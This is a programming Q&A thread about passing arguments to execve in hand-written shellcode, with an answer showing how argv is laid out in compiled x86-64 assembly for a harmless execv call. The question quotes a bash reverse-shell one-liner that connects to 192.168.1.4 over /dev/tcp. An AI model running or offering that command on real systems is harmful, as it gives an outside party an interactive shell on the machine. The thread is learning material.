# pass arguments to execve program in shellcode

Tags: assembly, shellcode, execve

I'm having a go at learning assembly and writing shellcode. I have a question about `execve` and passing arguments to the program it will execute.

I have working code to execute a bash shell but am unsure of the input format of `execve` to pass additional arguments to it. Can I do stdin stdout redirects too? I wanted to create a reverse tcp connection with this type of command line:

```
/bin/bash -i >& /dev/tcp/192.168.1.4/1234 0>&1
```

Should the arguments be separated with NULL's? I got it to execute a shell but it didn't connect back to the listening nc.

I know this is an unusual way of doing this but I just wanted to try something different :-)

Cheers

Answer (score 1):

The best way to know how to do is to compile an example and stop at assembly level. Lets take this example:

```
#include <unistd.h>

int
main ()
{
  char *program = "/bin/ls";
  char *args[3] = {"/bin/ls", "-l", "./"};

  execv(program, args);

  return 0;
}
```

When compiled with `gcc -Wall -Wextra -S -o myexec.s myexec.c` you can read in `myexec.s`:

```
        .file   "myexec.c"
        .section        .rodata
.LC0:
        .string "/bin/ls"
.LC1:
        .string "-l"
.LC2:
        .string "./"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        pushq   %rbp
        movq    %rsp, %rbp
        subq    $32, %rsp
        movq    $.LC0, -8(%rbp)
        movq    $.LC0, -32(%rbp)
        movq    $.LC1, -24(%rbp)
        movq    $.LC2, -16(%rbp)
        leaq    -32(%rbp), %rdx
        movq    -8(%rbp), %rax
        movq    %rdx, %rsi
        movq    %rax, %rdi
        call    execv
        movl    $0, %eax
        leave
        ret
```

So, the list of arguments of the command line is composed of a list of strings and, the first argument is the path to the executable file (`-8(rbp)`), then each argument is passed through a pointer to its string: `argv[0] = -16(%rbp)`, `argv[1] = -24(%rbp)`, `argv[2] = -32(%rbp)`, ... and so on.

So, you just have to have the addresses of each string and stack it (in the proper order) onto the stack before calling `execv`.

Comment: Thanks mate.  That has helped clear up things a bit for me.  I am not familiar with 64 bit but the concept of each arg being passed as a pointer to it's string is what I wasn't sure of (each NULL terminated I guess).  I'll have another go and I guess I'll find out if redirection works.

Comment: Well I re-wrote it and got it executing as it should but the redirection doesn't work as expected for some reason.  I get -i: >&: no such file or directory.